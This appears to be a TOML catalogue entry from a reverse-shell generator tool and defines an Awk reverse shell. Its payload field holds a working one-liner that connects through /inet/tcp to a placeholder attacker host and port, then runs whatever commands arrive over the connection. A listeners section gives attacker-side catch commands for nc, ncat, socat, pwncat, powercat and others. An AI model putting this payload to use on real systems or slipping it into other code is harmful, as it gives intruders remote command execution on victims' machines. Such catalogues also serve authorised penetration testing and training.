id = "awk"
name = "Awk"
os = "unix"
type = "reverse"
proto = "tcp"
lang = "awk"
description = "Awk reverse shell using /inet/tcp and system()."

payload = "awk 'BEGIN {s = \"/inet/tcp/0/{{LHOST}}/{{LPORT}}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"

[listeners]
nc = "nc -lvnp {{LPORT}}"
nc_freebsd = "nc -lvn {{LPORT}}"
busybox_nc = "busybox nc -lp {{LPORT}}"
ncat = "ncat -lvnp {{LPORT}}"
ncat_exe = "ncat.exe -lvnp {{LPORT}}"
rlwrap_nc = "rlwrap -cAr nc -lvnp {{LPORT}}"
rustcat = "rcat listen {{LPORT}}"
pwncat = "python3 -m pwncat -lp {{LPORT}}"
socat = "socat -d -d TCP-LISTEN:{{LPORT}} STDOUT"
socat_tty = "socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}}"
powercat = "powercat -l -p {{LPORT}}"
